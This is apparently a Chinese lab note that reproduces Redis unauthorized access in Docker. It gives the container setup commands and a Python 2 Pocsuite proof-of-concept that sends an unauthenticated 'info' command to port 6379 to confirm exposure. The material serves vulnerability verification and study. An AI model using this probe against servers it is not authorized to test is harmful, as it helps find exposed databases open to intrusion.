Redis未授权访问docker复现

docker搜索Redis镜像

docker search redis

拉去镜像到本地

docker pull redis

查看下载好的镜像

docker images

运行镜像

docker run -p 6379:6379 -d redis

-p 将容器的6379端口映射到主机的6379端口。

-d 将容器后台运行。

查看运行中的镜像

docker ps

POC构成

#!/usr/bin/env python # -*- coding: utf-8 -*- import socket from pocsuite.utils import register from pocsuite.poc import Output, POCBase class TestPOC(POCBase): vulID = '0' version = '1' author = 'nw01f' vulDate = '2018-10-23' createDate = '2018-10-23' updateDate = '2018-10-23' references = ['http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/'] name = 'Redis Unauthorized' appPowerLink = 'https://www.redis.io' appName = 'Redis' appVersion = 'All' vulType = 'Unauthorized' desc = ''' redis Unauthorized ''' samples = [''] def _verify(self): result = {} payload = '\x69\x6e\x66\x6f\x0d\x0a' ## info/r/n s = socket.socket() socket.setdefaulttimeout(4) try: host = self.url.split(':')[1].strip('/') if len(self.url.split(':')) > 2: port = int(self.url.split(':')[2].strip('/')) else: port = 6379 s.connect((host, port)) s.send(payload) data = s.recv(1024) if data and 'redis_version' in data: result['VerifyInfo'] = {} result['VerifyInfo']['url'] = self.url result['VerifyInfo']['port'] = port result['VerifyInfo']['result'] = data[:20] except Exception as e: print e s.close() return self.parse_attack(result) def _attack(self): return self._verify() def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail("error") return output register(TestPOC)

参考链接

http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/